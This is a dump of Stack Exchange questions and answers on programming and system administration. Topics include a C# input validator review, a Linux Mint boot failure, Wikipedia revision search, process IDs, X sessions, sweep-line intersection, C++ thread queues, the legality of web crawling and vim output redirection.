throw new ArgumentNullException(nameof(getValue)); this.validator = validator; } public InputValidatorParsed(Func<TValue> getValue) : this(getValue, null) { } public InputValidatorParsed<TValue> WithFailedAction(Action onFailedAction) { _onFailedAction = onFailedAction; return this; } public InputValidatorParsed<TValue> WithAllowedItems(IEnumerable<TValue> allowedItems) { return WithAllowedItems(allowedItems, _comparer); } public InputValidatorParsed<TValue> WithAllowedItems(IEnumerable<TValue> allowedItems, IEqualityComparer<TValue> comparer) { _allowedItems = allowedItems ?? throw new ArgumentNullException(nameof(allowedItems)); _comparer = comparer ?? throw new ArgumentNullException(nameof(comparer)); return this; } public ValidationResult<TValue> Validate() { var value = getInputValue.Invoke(); if (validator == null) { return new ValidationResult<TValue>(IsAllowedItem(value), value); } if (validator.Invoke(value) && IsAllowedItem(value)) { return new ValidationResult<TValue>(true, value); } _onFailedAction?.Invoke(); return new ValidationResult<TValue>(false, value); } private bool IsAllowedItem(TValue item) { return !_allowedItems.Any() || _allowedItems.Any(i => _comparer.Equals(i, item)); }}Example usage:var validator = new InputValidatorParsed<string>(Console.ReadLine, t => !string.IsNullOrEmpty(t)) .WithAllowedItems(new []{value}) .WithFailedAction(() => Console.WriteLine(Invalid input please try again.));var result = validator.Validate();while (!result.Success){ result = validator.Validate();}Console.WriteLine($Correct input = {result.Value});Feel free to comment on anything, but I have few concerns in mind:I'm not happy with the naming of the classes.I do like the initialization of such object but I don't like the usage of it. Those classes will mostly be used in while loops I can imagine and the syntax for that isn't really pretty if you want to obtain the value of the result.There is repetition in the classes that maybe an abstract class can solve in some way but I don't think it's appropriate in this case as it will either look redundant or it will be way too restrictive for the derived classes. | Validating proper input | c#;object oriented;validation;generics;inheritance | I don't think there should be two validators as they are nearly identical. The only difference between them is the parsing part. They are validators so they should get a value ready for validation and not try to parse anything. It's the responsibility of a parser to know how to convert/parse one type into another one.The validators also mix the builder pattern with a normal object. Methods like WithAllowedItems should be only used by a builder and not the actual object that should either have properties for that values or be immutable and require all parameters via a constructor. I find that the semi-builder pattern makes it confusing to use because at the end I expect to call ToInputValidator or Build which are not there because I'm constructing the final object with the WithX methods. 
What makes it even more confusing is that some arguments are already required by the constructor, which means that the WithX parameters are optional and could simply be properties, which are (at least to me) more natural to initialize with an object initializer than by calling methods as if it was a builder. What I expect is either this API: var validator = InputValidator<string> .Builder .Condition(Console.ReadLine, t => !string.IsNullOrEmpty(t)) .WithAllowedItems(new []{value}) .WithFailedAction(() => Console.WriteLine(Invalid input please try again.)) .Build(); // Throws InvalidOperationException if Condition not specified. or that one: var validator = new InputValidator<string>(Console.ReadLine, t => !string.IsNullOrEmpty(t)){ AllowedItems = new []{value}, FailedAction = () => Console.WriteLine(Invalid input please try again.)};
_unix.166410 | I was working on my Linux machine earlier today, and when I was in the middle of updating my Java packages through the package manager and installing CoffeeScript, my windows stopped working and closed down. I didn't think much of it and kept on working in TexStudio, finishing my hand-in for this week; I saved it, closed it, closed my browser and thought Hey, maybe it just needs a reboot! I then rebooted the computer, chose my Linux Mint partition, and here is where it gets weird. The only thing I see when I boot is the Linux Mint logo, and after that the screen is just completely black and all I can see is a few light grey pixels in the top left of my screen. It looks like a terminal cursor, but it's not flashing and nothing happens when I press my keyboard. The good news here is that I can boot the Linux partition in recovery mode, but I don't really know what to do from there. Is there a way to revert some of the latest changes back to how it was set up yesterday? Or am I completely lost here? I would love to have it up and running again, because it's my favorite development environment, but I do not know much about the kernel and how it works. If you need more info, please tell me how to get it and I will post it here. The lspci output is seen above. Also, I noticed that the message ideapad_laptop: Unknown Event: 1 appears on the screen about every 10 seconds. I cannot press Ctrl + Alt + F1 to enter a tty from non-recovery mode | Linux Mint (LMDE) suddenly crashed and won't boot again | boot;crash;system recovery | I noticed that what happened was that I had installed the boot sequence (or whatever it is called) on sdb1 or something similar, and not on sda where the boot flag was set. So what I did was boot Linux from a live USB and reinstall my Linux Mint, putting the boot sequence on sda and setting the boot flag there through gdisk. After that I installed GRUB from the terminal and ran sudo update-grub and tadaa, my problems were fixed and the GRUB loader now found the Linux boot loader and the Windows 7 boot loader :)
_webapps.35906 | Is there any way to find when a specific word or phrase was added to a Wikipedia page? I want to find a way to obtain the first revision that contains a match of a specific phrase (for example, the first occurrence of <ref>webapps.stackexchange.com</ref> in a page's revision history). (Manually searching through a page's revision history would be extremely tedious, so I'll need some kind of automated solution.) | Find when a phrase was added to a Wikipedia page | mediawiki;wikipedia | There is a tool called WikiBlame that lets you do exactly that: you enter a page name and a phrase to search for, and it will point you to the edit that added it. It's also linked from the History page of every page on the English Wikipedia (as Revision history search).
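For a fully scripted route, the same search can be run against the MediaWiki API (api.php, action=query with prop=revisions). The parameter names below reflect my understanding of the current API (rvslots, formatversion=2) and should be treated as assumptions to verify; long histories also need rvcontinue paging, which is omitted here.

import requests

API = "https://en.wikipedia.org/w/api.php"

def first_revision_containing(title, phrase):
    params = {
        "action": "query", "format": "json", "formatversion": 2,
        "prop": "revisions", "titles": title,
        "rvprop": "ids|timestamp|content", "rvslots": "main",
        "rvlimit": 50, "rvdir": "newer",          # oldest revisions first
    }
    data = requests.get(API, params=params).json()
    for rev in data["query"]["pages"][0].get("revisions", []):
        if phrase in rev["slots"]["main"]["content"]:
            return rev["revid"], rev["timestamp"]
    return None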
_unix.94430 | Please see the output of the ps command below: abc@smaug:~/Desktop$ ps ax | grep firefox 2213 ? Sl 2:01 /usr/lib/firefox/firefox 2644 pts/0 S+ 0:00 grep --color=auto firefox Please explain both rows and which process id can be used to kill the firefox process. Process id 2644 keeps changing every time I run that command. | process id and killing a process - ps command | process;kill;ps | When trying to find the PID of firefox, you launch a new process that filters out all the unwanted processes. This filter process (grep firefox) also contains the search term firefox and thus finds itself. Whenever you rerun ps ax | grep firefox you launch a new grep process, hence its PID keeps changing. So, the short answer is: use PID 2213 to kill firefox. If you want to get rid of the false positive, you can use another grep to filter it out: $ ps ax | grep firefox | grep -v grep Yet another option is to use pgrep (which will only give you the PIDs of the found processes): $ pgrep firefox 2213
_unix.47359 | What is the purpose of the .xsession file in the home folder? What should be put in there? The desktop environments don't use that file and for the X startup from the tty there is .xinitrc. | What is .xsession for? | xorg;x11;login | If you log in in text mode then start a GUI session with xinit or with the wrapper script startx, then xinit does the following things:Start an X server (typically through the script /etc/X11/xinit/xserverrc).Usually run some scripts in /etc/X11 (typically /etc/X11/xinit/xinitrc), depending on how it's set up.Run ~/.xinitrc, if it exists. If it doesn't exist, run a default client (traditionally xterm).Once ~/.xinitrc terminates, kill the X server.If you log in in graphical mode on an X display manager (xdm, gdm, kdm, wdm, lightdm, ), traditionally, what is executed after you log in is some scripts in /etc/X11 then ~/.xsession.~/.xsession has the role of ~/.profile and ~/.xinitrc combined: it's supposed to perform the initial startup of your session (e.g. define environment variables), then launch programs specific to the GUI (usually at least window manager).Nowadays, most X display managers give you a choice of a session. Choosing a particular session launched a specific desktop environment, session manager, window manager. What is executed then is only that DE/SM/WM and whatever programs it chooses to start based on whatever configuration files it chooses to read. Many environments provide a custom session that reads the traditional ~/.xsession. |
_datascience.2581 | I am trying to match new product description with the existing ones. Product description looks like this: Panasonic DMC-FX07EB digital camera silver. These are steps to be performed:Tokenize description and recognize attributes: Panasonic => Brand, DMC-FX07EB => Model, etc.Get few candidates with similar featuresGet the best candidate.I am having problem with the first step (1). In order to get 'Panasonic => Brand', DMC-FX07EB => Model, silver => color, I need to have index where each token of the product description correspond to certain attribute name (Brand, model, color, etc.) in the existing database. The problem is that in my database product descriptions are presented as one atomic attribute e.g. 'description' (no separated product attributes).Basically I don't have training data, so I am trying to build index of all product attributes so I can build training data. So far I have attributes from bestbuy.com and semantics3.com APIs, but both sources lack most of attributes or contain irrelevant ones. Any suggestions for better APIs to get product attributes? Better approach to do this? P.S. For every product there is a matched product description in the Database, which is as well in a form of one atomic attribute. I have checked this question on SO, it helped me and it seems we have same approach but I am still trying to get training data. | Attributes extraction from unstructured product descriptions | machine learning;nlp;feature extraction | null |
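While better attribute sources are being collected for the record above, a small gazetteer plus a model-number pattern is often enough to bootstrap training data for the tokenize-and-tag step. The lists and the regex below are illustrative placeholders, not a recommended schema.

import re

GAZETTEER = {
    "brand": {"panasonic", "canon", "nikon", "sony"},
    "color": {"silver", "black", "red", "blue"},
}
MODEL_RE = re.compile(r"^[A-Za-z]+-?[A-Za-z0-9]*\d[A-Za-z0-9]*$")   # e.g. DMC-FX07EB

def tag_tokens(description):
    tags = []
    for token in description.split():
        low = token.lower().strip(",;.")
        for attr, vocab in GAZETTEER.items():
            if low in vocab:
                tags.append((token, attr))
                break
        else:
            tags.append((token, "model" if MODEL_RE.match(token) else "other"))
    return tags

tag_tokens("Panasonic DMC-FX07EB digital camera silver")
# [('Panasonic', 'brand'), ('DMC-FX07EB', 'model'), ('digital', 'other'), ('camera', 'other'), ('silver', 'color')]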
_unix.226877 | I am not sure what I was thinking when I accidently deleted my /etc/dpkg/ folder. While I was fixing that, I tried many things and that made things worst. Now I am in a situation where I can not install or remove anything on my server. When I try to run something, it ends up on following message:E: Could not perform immediate configuration on 'multiarch-support'. Please see man 5 apt.conf under APT::Immediate-Configure for details. (2)I have tried everything I could :( Can someone please guide me here? Server is debian 6.0I can not install a fresh copy because I am using ispconfig to manage many domains and there is no way to backup that so I can install a fresh copy and restore stuff without doing a lot of work again.Server Response:Linux ispconfig.baskemus.com 2.6.32-5-amd64 #1 SMP Mon Feb 25 00:26:11 UTC 2013 x86_64The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.ispconfig# apt-get dist-upgradeReading package lists... DoneBuilding dependency treeReading state information... DoneCalculating upgrade... DoneThe following NEW packages will be installed:adduser apt apt-utils base-files base-passwd bash bash-completion bsdmainutils bsdutils ca-certificates coreutils dash dbus debconf debconf-i18n debian-archive-keyring debianutils diffutils dmsetup dpkg e2fslibs e2fsprogs findutils gawk gcc-5-base gnupg gnupg-curl gpgv grep gzip hostname init init-system-helpers initscripts insserv krb5-locales libacl1 libapparmor1 libapt-inst1.7 libapt-pkg4.16 libattr1 libaudit-common libaudit1 libblkid1 libbz2-1.0 libc-bin libc6 libcap-ng0 libcap2 libcap2-bin libcomerr2 libcryptsetup4 libcurl3-gnutls libdb5.3 libdbus-1-3 libdebconfclient0 libdevmapper1.02.1 libexpat1 libfdisk1 libffi6 libgcc1 libgcrypt20 libgmp10 libgnutls-deb0-28 libgpg-error0 libgpm2 libgssapi-krb5-2 libhogweed4 libidn11 libk5crypto3 libkeyutils1 libkmod2 libkrb5-3 libkrb5support0 libldap-2.4-2 liblocale-gettext-perl liblzma5 libmount1 libmpfr4 libncurses5 libncursesw5 libnettle6 libp11-kit0 libpam-cap libpam-modules libpam-modules-bin libpam-runtime libpam-systemd libpam0g libpcre3 libprocps4 libreadline6 librtmp1 libsasl2-2 libsasl2-modules libsasl2-modules-db libseccomp2 libselinux1 libsemanage-common libsemanage1 libsepol1 libsigsegv2 libsmartcols1 libss2 libssh2-1 libssl1.0.0 libstdc++6 libsystemd0 libtasn1-6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl libtinfo5 libudev1 libusb-0.1-4 libustr-1.0-1 libuuid1 login lsb-base mount multiarch-support ncurses-base ncurses-bin openssl passwd perl-base procps psmisc readline-common sed sensible-utils startpar systemd systemd-sysv sysv-rc sysvinit sysvinit-utils tar tzdata udev util-linux uuid-runtime zlib1g0 upgraded, 143 newly installed, 0 to remove and 0 not upgraded.Need to get 0 B/47,5 MB of archives.After this operation, 149 MB of additional disk space will be used.Do you want to continue [Y/n]? yE: Could not perform immediate configuration on 'multiarch-support'. Please see man 5 apt.conf under APT::Immediate-Configure for details. (2)ispconfig# | Could not perform immediate configuration on 'multiarch-support' | dpkg;dependencies | null |
_cs.33681 | In the same lecture notes, without providing many details, it says that the complexity of the algorithm which uses a balanced search tree is $O(n\log n+R)$, where $R$ is the total number of intersections. However, I don't understand why this is the case. Suppose that the sweep line is travelling from top to bottom. Whenever we encounter a vertical line segment, we pick its $x$ coordinate and add it to a search tree. Assuming that we are using a balanced search tree like AVL, this operation will take $O(\log n)$ time. Now when we reach an end point of a vertical line segment, we remove its $x$ coordinate from the search tree, which is going to take $O(\log n)$ time as well. Whenever we encounter a horizontal line segment defined by points $A$ and $B$, we have to do a range search on our search tree using the range defined by these two points, that is $(A.x, B.x)$. Now how is this range search going to happen? We use $A.x$ and travel to the leftmost point in the search tree, and do the same for $B.x$; we can do this in $O(2\log n)$. All the points in our tree between these two end points are going to be intersecting the horizontal segment, which is going to be, let's say, $R$ in total, so $O(2\log n+R)$ in total. We do this $n$ times (the number of horizontal segments), so we get a complexity of $O(2n\log n+nR)$. | Why is the orthogonal line segment intersection algorithm $O(n\log n+R)$ instead of $O(n\log n + Rn)$? | algorithms;algorithm analysis;computational geometry;search trees | It's a bit hard to get through your text since a lot of information is missing. However, I assume that you have the following misunderstanding. Let me ignore the constants in the big-O for this argument since they are irrelevant. For every horizontal segment $h$ you perform an action that takes $O(\log n + R_h)$ time, where $R_h$ is the number of intersections you output for that segment. Then the overall running time is$$\sum_h (\log n + R_h) = n\log n + R.$$Simply speaking, you only output every crossing once, so the overall time for the output is $O(R)$.
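To make the accounting in that answer concrete, here is a sketch of the sweep itself. It uses a plain sorted Python list, so the inserts and removals are O(n) rather than the O(log n) a balanced tree gives, but the point it illustrates stands: each horizontal segment pays O(log n) to locate its range plus one step per intersection it reports, and those per-segment R_h terms sum to R once over the whole run, not n times.

import bisect

def sweep(vertical, horizontal):
    # vertical: (x, y_top, y_bottom) triples; horizontal: (y, x_left, x_right) triples
    events = []
    for x, y_top, y_bot in vertical:
        events.append((y_top, 0, x))             # segment becomes active
        events.append((y_bot, 2, x))             # segment stops being active
    for y, xl, xr in horizontal:
        events.append((y, 1, (xl, xr)))
    events.sort(key=lambda e: (-e[0], e[1]))     # sweep from top to bottom
    active, out = [], []
    for y, kind, payload in events:
        if kind == 0:
            bisect.insort(active, payload)       # O(log n) in a balanced search tree
        elif kind == 2:
            active.remove(payload)               # likewise O(log n) with a real tree
        else:
            xl, xr = payload
            lo = bisect.bisect_left(active, xl)  # O(log n) to locate the range
            hi = bisect.bisect_right(active, xr)
            out.extend((x, y) for x in active[lo:hi])   # one step per reported crossing
    return out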
_softwareengineering.149911 | Is it recommended to use a WCF Service Library in developing an N-Tier Windows Application? Also, is it better to use the VS wizards to create the DataTables and DataSets? And if so, should I add all of my tables to 1 dataset or have a dataset for each table? This is all new to me and I want to learn it the right way. | WCF Service in an N-tier Application | c#;database;n tier | Is it recommended to use a WCF Service Library in developing an N-Tier Windows Application? WCF is a good way to access databases through firewalls. However, if your application is used by users in the same office where there is a common LAN, I don't think the complexity would be justified. This is especially true if the database is owned and controlled only by this one application. Also, is it better to use the VS wizards to create the DataTables and DataSets? In many cases, you need to tailor the data passed between the tiers or layers. I would suggest that you look into Entity Framework or another ORM to take care of this for you. Also, the suggestion by @Ourjamie is good. Should I add all of my tables to 1 dataset or have a dataset for each table? As a rule, you need to optimize the data moved between tiers/layers. Sometimes you don't need the features of a dataset (like tracking changes), so you don't use what you don't need. Your choice of a data structure will also be affected by the bind mechanism on the client and how you plan to notify the data layer of data changes. It is easier to use datasets, but not always popular. I suggest you assess your real need for an N-tier architecture (if N>2). Also, you may want to consider Microsoft RIA Services, which may be easier for you than WCF. One last word: sometimes the skills of the team drive technology. Make sure your team is good enough in these technologies before committing to deadlines.
_codereview.110370 | I have two threads, one produces images and one processes them. For the synchronization, I created a class where you can set and get images, and it always waits until an image is available or a worker thread is not busy anymore.Additionally, a call to SetFinish stops both threads, while a call to Clear clears the currently (not yet processed) image.Do you see any problems with this code (mainly threading issues)?Header:#ifndef SHARED_QUEUE_H_#define SHARED_QUEUE_H_#include <memory>#include <condition_variable>struct ImageData;class SharedQueue {public: void SetFinish(); bool GetImage(std::shared_ptr<const ImageData> &image); void SetImage(std::shared_ptr<const ImageData> image); void Clear();private: std::condition_variable image_available_; std::condition_variable image_processed_; std::shared_ptr<const ImageData> next_image_; bool stop_{false}; std::mutex mutex_;};#endif // SHARED_QUEUE_H_Implementation:#include shared_queue.hvoid SharedQueue::SetFinish() { { // Store flag and wake up the thread std::lock_guard<std::mutex> lock(mutex_); stop_ = true; } image_available_.notify_one(); image_processed_.notify_one();}bool SharedQueue::GetImage(std::shared_ptr<const ImageData> &image) { { std::unique_lock<std::mutex> lock(mutex_); image_available_.wait(lock, [this]{ return (next_image_.get() != nullptr || stop_); }); if (stop_) return false; image = next_image_; next_image_.reset(); } image_processed_.notify_one(); return true;}void SharedQueue::SetImage(std::shared_ptr<const ImageData> image) { { // Store image for processing and wake up the thread std::unique_lock<std::mutex> lock(mutex_); image_processed_.wait(lock, [this]{ return (next_image_.get() == nullptr || stop_); }); if (stop_) return; next_image_ = image; } image_available_.notify_one();}void SharedQueue::Clear() { { std::unique_lock<std::mutex> lock(mutex_); next_image_.reset(); } image_processed_.notify_one();} | Multithreading, shared queue as synchronization point | c++;c++11;multithreading;asynchronous;synchronization | Not a Queue!First and foremost, your SharedQueue isn't a queue. You can only store one element in it at a time. That doesn't make it super useful - what if the producer wants to write two images?queue.setImage(img1);queue.setImage(img2); // blocks?It's more of a guarantee-one-at-a-time container. A queue would be much more useful, so I'd consider actually implementing one. This is a pretty major design flaw.Beyond that, I just have minor comments.Move semanticsYou have a lot of copies where you can do moves. For instance, in SetImage():next_image_ = image;should be:next_image_ = std::move(image);Moving is cheaper than copying (no need to incur reference counting). Checking shared_ptrYou don't need to use .get(), you can directly check the shared_ptr:image_processed_.wait(lock, [this]{ return !next_image_ || stop_;});Clear()You use a std::unique_lock<> to Clear() where a std::lock_guard<> is sufficient. You use the correct one in SetFinish(). |
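For comparison with the one-slot design criticized in that review, here is the same handshake generalized to an actual bounded queue, sketched in Python rather than C++ so the condition-variable choreography stays short; a C++ version would keep the std::mutex/std::condition_variable pair and swap the single shared_ptr for a std::deque.

from collections import deque
from threading import Condition

class SharedQueue:
    def __init__(self, capacity):
        self._items = deque()
        self._capacity = capacity
        self._stop = False
        self._cond = Condition()

    def set_finish(self):
        with self._cond:
            self._stop = True
            self._cond.notify_all()          # wake both producer and consumer

    def put(self, item):
        with self._cond:
            self._cond.wait_for(lambda: self._stop or len(self._items) < self._capacity)
            if self._stop:
                return False
            self._items.append(item)
            self._cond.notify_all()
            return True

    def get(self):
        with self._cond:
            self._cond.wait_for(lambda: self._stop or self._items)
            if self._stop:
                return None
            item = self._items.popleft()
            self._cond.notify_all()
            return item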
_softwareengineering.237183 | When Google, Bing or Yahoo are crawling content from Web sites, what makes it legal? Is there a public registry of only allowed crawlers? When researchers are crawling Deep Web, what makes their efforts legal?When tester automate their tests with Selenium or JMeter and hit same site multiple times, what makes their effort illegal?In each of those cases, an automate is consuming Internet bandwidth of the Web site, and copying their content. But some are considered legal, and other are not. | What makes Web crawling legal? | testing;web | At the risk of stating obvious tautologies, something is only illegal if there is a law against it. When someone puts up a website, it is considered open to the public by default. If there is content that should only be available to certain people, it's up to the web designer to secure it in some way.When content is secured, and someone without authorization accesses it through hacking, this is generally considered morally equivalent to finding the door to somebody's house locked and then breaking in, and there are laws against doing so in most jurisdictions.The intent of the website owner matters for a lot. A good deal of deep web content is content that site owners would like to make available, but isn't easily accessible to normal web crawlers. On the other hand, if an owner puts a rule in robots.txt to exclude certain content from a crawler, and the crawler indexes it anyway, this is considered more or less equivalent to wandering onto someone's property when there's a NO TRESPASSING sign in clear view. But most websites welcome search engine traffic, because it drives actual users to the site, which helps accomplish the purpose of the site, whatever that purpose may be. (Usually making money, spreading information, or both.)As for overuse of automated testing tools, this is something very different from a web crawler. A crawler has algorithms to only hit any given page once, and its principal purpose is to index sites so as to drive traffic to them, which most webmasters consider is worth the cost in bandwidth and processor power. But hitting the same page repeatedly by some tool that's not going to bring in new users does nothing to further the purposes of the site, and so the costs that it places on the site owner are essentially wasted. Unless the site owner actually asked for it, (for example, as part of a test of his site's capabilities,) it's generally considered unwelcome and harmful. |
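The robots.txt convention mentioned in that answer is mechanical enough to check in a few lines; Python's standard library ships urllib.robotparser for exactly this purpose (the URL and user-agent string below are placeholders):

from urllib.robotparser import RobotFileParser

rp = RobotFileParser()
rp.set_url("https://example.com/robots.txt")
rp.read()

if rp.can_fetch("MyCrawler/1.0", "https://example.com/private/page.html"):
    print("allowed to fetch")
else:
    print("disallowed by robots.txt - a polite crawler skips this URL")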
_softwareengineering.314595 | A major application we use has a bug that the vendor is calling (a swear word in our business) working as designed. As a programmer / system analyst, this is a bug - it goes against everything I have been taught about how systems / database programming / multi-user applications etc. should act when erroneous data is removed / marked deleted etc. The error is that numerous, at times critical, downstream code paths (in their own software!) look for a single record in the database for that client's current appointment for value X (Table = ClientID, ClientVisitID, Code, CodeValue, DateStamp). This single record holds the most current value for data that changes semi-regularly. If my staff sets the value of X to 123 in any document, or datagrid, or entry form, it updates the single record to X = 123 (depending on the temporal nature of where the data was entered, e.g. document created yesterday versus time column in the datagrid for today). This speeds up downstream systems that need the value of X - they only have to look in one place, else decide to look in previous visit(s) for the most current value (depending on rules for how long to look back etc.). If NO value of X has been recorded this visit, then there is NO row in the single record table. The downstream system then follows other rules (e.g. limits on how long to look back) to get the result. The Scenarios: My staff records X = 100 in the last visit (a day ago); my staff records nothing this visit; nothing in the single row table (for this visit); downstream systems retrieve X as 100 from the last visit. - My staff records X = 100 in the last visit (a day ago); my staff records X = 120 in the current visit (today); 120 in the single row table, datestamp = today; downstream systems retrieve X = 120 from the single row table. - My staff records X = 100 in the last visit (a day ago); my staff records X = 999 (in error) in the current visit (today + 1 min); 999 in the single row table, datestamp = today + 1 min; my staff deletes the record (as allowed by the application); **empty string (not null) in the single row table, datestamp = today + 1 min; downstream systems retrieve nothing, and get nothing from the previous visit**. - My staff records X = 100 in the last visit (a day ago); my staff records X = 120 in the current visit (today); 120 in the single row table, datestamp = today; my staff records X = 999 (in error) in the current visit (today + 1 min); 999 in the single row table, datestamp = today + 1 min; my staff deletes the record (as allowed by the application); **empty string (not null) in the single row table, datestamp = today + 1 min; downstream systems retrieve nothing, and act as if 120 was never recorded**. So - what PROFOUND IRREFUTABLE software design concept do I need to tell my vendor this behaviour disobeys? What quality standard in programming does this contravene? How do I frame it in a way that makes sense? | How to explain to a vendor that when erroneous data is deleted/deactivated the application future state should be as if the data was never entered? | user interface;finite state machine | null
_codereview.20385 | Before, I had this code, sometimes it is longer:String dbEntry = idBldgInfo = ' + currentBldgID + ',scenario = '305',installCost=' +installCost + ',annualSave=' + annualSave + ',simplePayback=' + simplePayback + ',kwhPre=' + preKWH + ',kwhPost=' + postKWH + ',co2Pre=' + preCO2e + ',co2Post=' +postCO2e + ',mbtuPre=' + preMBtu + ',mbtuPost=' + postMBtu + ',shortDescription=' +econ4ShortDescription + ',category=' + category + ',longDescription=' +econ4LongDescription + ';I refactored it into:String newDbEntry = getDBEntryFromDBPairs( new DBPair(idBldgInfo, currentBldgID), new DBPair(scenario, 305), new DBPair(installCost, installCost), new DBPair(annualSave, annualSave), new DBPair(simplePayback, simplePayback), new DBPair(kwhPre, preKWH), new DBPair(kwhPost, postKWH), new DBPair(co2Pre, preCO2e), new DBPair(co2Post, postCO2e), new DBPair(mbtuPre, preMBtu), new DBPair(mbtuPost, postMBtu), new DBPair(shortDescription, econ4ShortDescription), new DBPair(category, category), new DBPair(longDescription, econ4LongDescription));It looks only slightly better. Is it worth changing it?The getDBEntryFromDBPairs method is much more efficient since it uses a StringBuilder. But IDK. Any thoughts/suggestions are appreciated. | String Building | java;strings | null |
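A language-neutral way to see the refactor in the question above is that the fields become data and the quoting/joining happens once; here it is sketched in Python rather than the question's Java, with placeholder keys and values.

def db_entry(pairs):
    return ",".join("{}='{}'".format(key, value) for key, value in pairs)

db_entry([
    ("idBldgInfo", "B-42"),       # placeholder values, not the question's variables
    ("scenario", "305"),
    ("installCost", 1200),
])
# -> "idBldgInfo='B-42',scenario='305',installCost='1200'"

In the Java version the equivalent is a single loop (or StringJoiner / Collectors.joining) over the DBPair array, which keeps the StringBuilder benefit without the fourteen explicit constructor calls.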
_codereview.25308 | The code below is equivalent. I can see pros and cons for both versions. Which is better: the short, clever way, or the long, ctrl+c way?Short version:character.on(key,function(key){ var action = ({ a:{axis:x,direction:-1}, d:{axis:x,direction:1}, w:{axis:y,direction:1}, s:{axis:y,direction:-1}})[key[1]], stop = key[0]==-; if (action) if (stop) this.walkdir[action.axis] = 0; else this.walkdir[action.axis] = this.lookdir[action.axis] = action.direction;});Long version:character.on(key,function(key){ switch (key){ case +a: this.walkdir.x = -1; this.lookdir.x = -1; break; case +d: this.walkdir.x = 1; this.lookdir.x = 1; break; case +w: this.walkdir.y = 1; this.lookdir.y = 1; break; case +s: this.walkdir.y = -1; this.lookdir.y = -1; break; case -a: if (this.walkdir.x == -1) this.walkdir.x = 0; break; case -d: if (this.walkdir.x == 1) this.walkdir.x = 0; break; case -w: if (this.walkdir.y == 1) this.walkdir.y = 0; break; case -s: if (this.walkdir.y == -1) this.walkdir.y = 0; break; case space: this.setStance(jumping); break; };}); | Two keyboard handlers for a video game character | javascript;game;comparative review;event handling | The short code wins hands down. I understood it immediately, and more importantly, I can trivially verify that the code is reasonably error free. This is much harder with the longer code.You say that the longer code is easier to understand but I claim that this is objectively wrong.Case in point, the long code uses lots of magic numbers: 1, 0, -1, what do these stand for? Ah, the short code tells us: they are directions.The longer code also makes us scroll (depending on the screen size) to see the whole method. This significantly impacts ease of understanding. I believe there were even studies demonstrating this empirically (but I cannot cite them; Code Complete would probably be the relevant reference here).The one thing I would change in the short code is the lookup itself: define the dictionary separately, maybe even outside the method, and perform the lookup as follows:var action = movement_commands[key[1]];And maybe think about tokenising key properly, i.e. assigning the parts to variables before using them. However, I think that the method is short enough to make this unnecessary.You also said that the longer code is more efficient but Id like to see a benchmark before I believe that. You probably think that the first code is slower because of the dictionary lookup. But consider that JavaScript is a dynamic language every single variable access is potentially a dictionary lookup internally. So there is no difference in performance indeed, the short code could be faster since theres less variable lookup involved.(Of course the two code snippets do different things: the long version handles jumping, and they behave differently when the character was previously walking in one direction and now you cancel walking into a different direction.) |
_unix.2811 | A network sensor I'm evaluating is showing that my Opensolaris server is broadcasting on the snmp port 161, and I'm getting alerts about every 2 minutes. How can I turn off the snmp broadcast (i.e. traps?) on the Opensolaris machine?We have snmp enabled on the Opensolaris machine for Cacti, so it should really just be acting like a client in regards to snmp. Is there a configuration setting somewhere? I'm not familiar with snmp, but somehow got it up and running for Cacti. I see that /usr/sbin/snmpd is running. Any thoughts? Thanks. | Opensolaris snmp broadcast | opensolaris | I would check all services running and try disabling each of them one at a time, starting with the most suspicious. Some googling suggests:/etc/rc3.d/S76snmpdx stop/etc/rc3.d/S77dmi stop(assuming you are in runlevel 3) |
_unix.282789 | I have a very annoying problem. I've been using Mac Terminal over SSH to write a Perl script with vim on a local virtual Debian machine. The Perl script uses the WWW::Mechanize::Firefox module, which in turn uses the MozRepl::RemoteObject module. The problem I'm having is that output from MozRepl shows up in another terminal window on another tty every time I run the script, making it a mess: I have to close out the vim session and reopen it to clear the garbage from the terminal. I don't want to completely suppress the output of the script, because I need it to print debug statements; I just want to stop the output from MozRepl from showing up in my terminal window. I tried setting log => ['fatal'] when creating the W:M:F object, but it had no effect. | MozRepl output showing up in terminal window | debian;terminal;perl;tty | null
_softwareengineering.298817 | I'm starting a new MVC 5 project from scratch. I'm using EF 6 (Database First) and Identity 2.0. My solution consists of 3 different projects: Data (where I have a .edmx and my DB context), Resources (for localization purposes) and Web (the web project itself). I'm using ViewModels for all my views, by default. Every time I create a new view, the first thing I do is add the ViewModel (if the ViewModels are related to each other, I keep them all in the same file; for example, all the ViewModels related to user accounts I keep in AccountViewModels). So far, this has made things very simple and solved several issues I was having before. But I'm wondering, does it make sense for me to use Models at all? The only one I am using right now is the one for Identity, which is created by default and contains the ApplicationUser and ApplicationDbContext, both specific and necessary to Identity. Outside of that, it's all ViewModels. Would my Data project be considered the Model for my application? In that case I am in fact using a Model, just that instead of being a bunch of classes I keep in Web\Models, it's a separate project where the Models (BL objects created by Entity) are stored. I think so, but I am not sure. Is this the right approach, or could there be potential issues down the road? It's my first take on web programming, so I would appreciate any advice. | Never using Models, only ViewModels | c#;.net;mvc;asp.net;asp.net mvc | Would my Data project be considered the Model for my application? Yes, that's exactly what the Model is supposed to be. Is this the right approach? I believe it is. Or could there be potential issues down the road? There definitely will be. But the description of your architecture is so vague that we can only guess what kind of problems you will encounter.
_softwareengineering.256529 | I am designing a REST API and figured I would look at how others name their resources and choose their routes. I looked at Twitter's API and saw that they have nested resources. For example, in https://dev.twitter.com/rest/reference/get/statuses/retweets_of_me the resource is called retweets_of_me, but it is also nested under statuses. Does this mean that there is a logical association between the two resources? I can pick whatever routes I want to use, but arbitrarily nesting routes probably isn't good practice. | What are the standards for having nested resources in REST API | rest | null
_unix.141661 | I want to export the output of the vi command :set fileencoding to another file. It seems vi's file encoding detection is better than the file command's. How can I do that? I could write a macro with :set fileencoding followed by :q, but this won't export the output. | Redirect vi command output to a file | vim;vi | In vim, you can use the :redir command. In command mode: :redir > vim.output | set fileencoding | redir END Then the output of set fileencoding will be saved to vim.output. There are many other options for redir; you can see :help redir for more details. This works in vim, not in vi.
_webmaster.107464 | As the title asks, how would one go about reporting a site to Google for keyword stuffing? I can't seem to find any way to do this other than reporting a site for being spammy. | Reporting a site for keyword stuffing? | seo;reporting;keyword stuffing | null
